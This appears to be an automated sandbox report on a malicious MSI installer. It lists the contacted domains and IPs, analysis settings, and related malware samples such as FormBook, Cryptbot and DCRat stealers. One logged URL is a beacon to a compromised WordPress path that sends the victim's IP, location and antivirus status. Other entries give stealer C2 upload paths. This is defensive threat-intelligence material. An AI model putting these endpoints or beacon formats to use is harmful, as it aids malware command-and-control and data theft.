https://www.fuhnwijude.com/wp-admin/js/cnt/system/conta.php?IDR=8.46.123.33&PC=818225&DTF=23/08/2024%2013:16:15&UF=New%20York&CAP=New%20York%20City&APP=%20Nao%20tem%20aplicativo&ANT=Topaz%20OFD%20Nao&SPM=AGOSTO0%Avira URL Cloudsafe
https://csp.withgoogle.com/csp/gws/other-hp0%Avira URL Cloudsafe
https://www.google.com/?gws_rd=ssl0%Avira URL Cloudsafe
http://tools.ietf.org/html/rfc1321U0%Avira URL Cloudsafe
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf0%Avira URL Cloudsafe
http://www.movable-type.co.uk/scripts/xxtea.pdf0%Avira URL Cloudsafe
http://tools.ietf.org/html/rfc13210%Avira URL Cloudsafe
http://www.schneier.com/paper-twofish-paper.pdf0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfU0%Avira URL Cloudsafe
http://www.schneier.com/paper-blowfish-fse.htmlS0%Avira URL Cloudsafe
http://tools.ietf.org/html/rfc4648U0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS0%Avira URL Cloudsafe
http://www.schneier.com/paper-blowfish-fse.htmlU0%Avira URL Cloudsafe
http://www.ietf.org/rfc/rfc3447.txt0%Avira URL Cloudsafe
http://tools.ietf.org/html/rfc4648S0%Avira URL Cloudsafe
http://www.schneier.com/paper-blowfish-fse.html0%Avira URL Cloudsafe
http://www.itl.nist.gov/fipspubs/fip180-1.htm0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf0%Avira URL Cloudsafe
https://codewith.it/favicon.ico0%Avira URL Cloudsafe
http://www.movable-type.co.uk/scripts/xxtea.pdfU0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfU0%Avira URL Cloudsafe
http://www.movable-type.co.uk/scripts/xxtea.pdfS0%Avira URL Cloudsafe
https://codewith.it/img/browserconfig.xml0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS0%Avira URL Cloudsafe
http://www.itl.nist.gov/fipspubs/fip180-1.htmU0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf0%Avira URL Cloudsafe
http://www.schneier.com/paper-twofish-paper.pdfS0%Avira URL Cloudsafe
http://www.schneier.com/paper-twofish-paper.pdfU0%Avira URL Cloudsafe
http://tools.ietf.org/html/rfc46480%Avira URL Cloudsafe
https://ipinfo.io/json0%Avira URL Cloudsafe
http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfU0%Avira URL Cloudsafe
https://codewith.it/0%Avira URL Cloudsafe
https://unpkg.com/monaco-editor0%Avira URL Cloudsafe
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfU0%Avira URL Cloudsafe
http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS0%Avira URL Cloudsafe
http://www.ietf.org/rfc/rfc3447.txtU0%Avira URL Cloudsafe
http://schema.org/SiteNavigationElement0%Avira URL Cloudsafe
http://www.ietf.org/rfc/rfc3447.txtS0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.250.185.78
truefalse
    unknown
    fuhnwijude.com
    198.20.110.106
    truefalse
      unknown
      codewith.it
      188.114.97.3
      truefalse
        unknown
        ipinfo.io
        34.117.59.81
        truefalse
          unknown
          www.google.com
          216.58.212.164
          truefalse
            unknown
            www.fuhnwijude.com
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://www.fuhnwijude.com/wp-admin/js/cnt/system/conta.php?IDR=8.46.123.33&PC=818225&DTF=23/08/2024%2013:16:15&UF=New%20York&CAP=New%20York%20City&APP=%20Nao%20tem%20aplicativo&ANT=Topaz%20OFD%20Nao&SPM=AGOSTOfalse
              • Avira URL Cloud: safe
              unknown
              https://codewith.it/p/zNgG4Gfalse
              • Avira URL Cloud: safe
              unknown
              https://www.google.com/?gws_rd=sslfalse
              • Avira URL Cloud: safe
              unknown
              https://ipinfo.io/jsonfalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://ipinfo.io/missingauthchrome.exe, 00000008.00000002.4127616181.0000000007CCB000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4127616181.0000000007C3C000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://tools.ietf.org/html/rfc1321Uchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://crashpad.chromium.org/chrome.exe, chrome.exe, 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000003.00000000.1740214188.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000000.1758151655.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000002.1775306511.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000000.1774187268.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000002.1788091642.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000000.1784911644.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000002.1799707276.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000002.1811641793.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000000.1798792150.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpfalse
              • URL Reputation: safe
              unknown
              http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdfchrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://crashpad.chromium.org/bug/newchrome.exe, chrome.exe, 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000003.00000000.1740214188.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000000.1758151655.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000002.1775306511.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000000.1774187268.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000002.1788091642.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000000.1784911644.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000002.1799707276.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000002.1811641793.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000000.1798792150.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpfalse
              • URL Reputation: safe
              unknown
              https://csp.withgoogle.com/csp/gws/other-hpchrome.exe, 00000008.00000002.4127616181.0000000007CCB000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.movable-type.co.uk/scripts/xxtea.pdfchrome.exefalse
              • Avira URL Cloud: safe
              unknown
              http://tools.ietf.org/html/rfc1321chrome.exe, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfchrome.exefalse
              • Avira URL Cloud: safe
              unknown
              http://www.schneier.com/paper-twofish-paper.pdfchrome.exefalse
              • Avira URL Cloud: safe
              unknown
              http://www.schneier.com/paper-blowfish-fse.htmlSchrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.schneier.com/paper-blowfish-fse.htmlUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfSchrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://tools.ietf.org/html/rfc4648Uchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://tools.ietf.org/html/rfc4648Schrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.ietf.org/rfc/rfc3447.txtchrome.exefalse
              • Avira URL Cloud: safe
              unknown
              https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newchrome.exe, 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000003.00000000.1740214188.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000000.1758151655.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000002.1775306511.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000000.1774187268.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000002.1788091642.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000000.1784911644.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000002.1799707276.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000002.1811641793.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000000.1798792150.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.schneier.com/paper-blowfish-fse.htmlchrome.exefalse
              • Avira URL Cloud: safe
              unknown
              http://www.itl.nist.gov/fipspubs/fip180-1.htmchrome.exe, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfchrome.exefalse
              • Avira URL Cloud: safe
              unknown
              http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfchrome.exefalse
              • Avira URL Cloud: safe
              unknown
              http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfSchrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://codewith.it/favicon.icochrome.exe, 00000008.00000002.4127616181.0000000007CF2000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.movable-type.co.uk/scripts/xxtea.pdfUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.movable-type.co.uk/scripts/xxtea.pdfSchrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://codewith.it/img/browserconfig.xmlchrome.exe, 00000008.00000002.4127616181.0000000007CF2000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfchrome.exefalse
              • Avira URL Cloud: safe
              unknown
              http://www.schneier.com/paper-twofish-paper.pdfUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.itl.nist.gov/fipspubs/fip180-1.htmUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.schneier.com/paper-twofish-paper.pdfSchrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://tools.ietf.org/html/rfc4648chrome.exefalse
              • Avira URL Cloud: safe
              unknown
              http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdfUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://codewith.it/chrome.exe, 00000008.00000002.4127616181.0000000007CF2000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://unpkg.com/monaco-editorchrome.exe, 00000008.00000002.4127616181.0000000007CF2000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfSchrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schema.org/SiteNavigationElementchrome.exe, 00000008.00000002.4127616181.0000000007CF2000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.ietf.org/rfc/rfc3447.txtUchrome.exe, 00000003.00000002.1761101751.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000004.00000002.1776719413.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000005.00000002.1792100398.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000006.00000002.1800590015.000000006B301000.00000020.00000001.01000000.00000004.sdmp, chrome.exe, 00000007.00000002.1813021971.000000006B301000.00000020.00000001.01000000.00000004.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.ietf.org/rfc/rfc3447.txtSchrome.exe, 00000004.00000002.1776107938.000000000754D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1774447092.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1785316542.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.1791471774.000000000757D000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1809456341.0000000000401000.00000020.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.1812402514.00000000076FD000.00000040.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4126887117.00000000072DD000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              142.250.185.78
              google.comUnited States
              15169GOOGLEUSfalse
              188.114.97.3
              codewith.itEuropean Union
              13335CLOUDFLARENETUSfalse
              216.58.212.164
              www.google.comUnited States
              15169GOOGLEUSfalse
              34.117.59.81
              ipinfo.ioUnited States
              139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
              198.20.110.106
              fuhnwijude.comUnited States
              32475SINGLEHOP-LLCUSfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1498175
              Start date and time:2024-08-23 19:15:10 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 26s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:14
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:nf963-5d-qns6-w812.msi
              Detection:MAL
              Classification:mal72.evad.winMSI@16/167@5/5
              EGA Information:
              • Successful, ratio: 80%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .msi
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target chrome.exe, PID 4960 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: nf963-5d-qns6-w812.msi
              TimeTypeDescription
              13:16:04API Interceptor1x Sleep call for process: msiexec.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.114.97.3Bonelessness.exeGet hashmaliciousSimda StealerBrowse
              • lysyvan.com/login.php
              700987654656676.exeGet hashmaliciousDBatLoader, FormBookBrowse
              • www.coinwab.com/kqqj/?eJ=7HHhUI7NBywWL5iw6vBoOC1R9nc6cE2Y1UmgCStXrWBBqhu9PJUZU2f6gs8mUMG7LvvYO9vLlwJ8Ne8neaHQQZFpXb2jdQdMFopJRCp5HeIQieixqdhWtgQ=&zPCT=URo4h
              PI#220824.exeGet hashmaliciousFormBookBrowse
              • www.bbyul.shop/1i58/
              Document 21824RXVPO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
              • www.avantfize.shop/y1j7/
              PI #9100679047.exeGet hashmaliciousFormBookBrowse
              • www.bbyul.shop/1i58/?6fQ=evG0&gLc=XqU6jghuSqY8MpCZA7iVsp22hhGmB+aP50JZxBPQHjQb8W504z1krI9n0nehtDU4K/YNHLkqPrKb1IHVqfZj2x+2juMl9gnRGRd/nNq6cBsZ0P16fQsAoUY=
              Set-up.exeGet hashmaliciousCryptbotBrowse
              • neincl19vt.top/v1/upload.php
              Set-up.exeGet hashmaliciousCryptbotBrowse
              • neincl19vt.top/v1/upload.php
              FBOZtotG0B.exeGet hashmaliciousFormBookBrowse
              • www.airjordanshoes-retro.com/pnug/?2dspOd=AX11mY4Iex5wpHTe91zK9nvlXefs17kM1tSqI7fyOBEm1FhVLS5QqQ0EZeQzJt9gxavotpRXJA==&vRitR=02J8TVd8MN
              Shipping Documents.exeGet hashmaliciousFormBookBrowse
              • www.bbyul.shop/1i58/
              webWin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • 494375cm.n9sh.top/ProviderPythonPhpsecureauthgamelinuxDlePrivate.php
              34.117.59.81mekotio_xoredps1.ps1Get hashmaliciousUnknownBrowse
              • ipinfo.io/json
              DevolucionImpuestoJulioTGR.cmd_BQVDQNuQQAGG.cmdGet hashmaliciousUnknownBrowse
              • ipinfo.io/json
              mek_n_bat.batGet hashmaliciousUnknownBrowse
              • ipinfo.io/json
              QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
              • ipinfo.io/json
              z30PO1028930.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
              • ipinfo.io/ip
              SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
              • ipinfo.io/ip
              SecuriteInfo.com.Win32.KeyloggerX-gen.20370.1036.exeGet hashmaliciousUnknownBrowse
              • ipinfo.io/ip
              IP-Grabber.ps1Get hashmaliciousUnknownBrowse
              • ipinfo.io/ip
              BadUsb.ps1Get hashmaliciousUnknownBrowse
              • ipinfo.io/ip
              ZmYfQBiw.exeGet hashmaliciousUnknownBrowse
              • ipinfo.io/
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ipinfo.io3797b089c11dcb14a87fecc45c8ab3e0f9937b30dde47.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
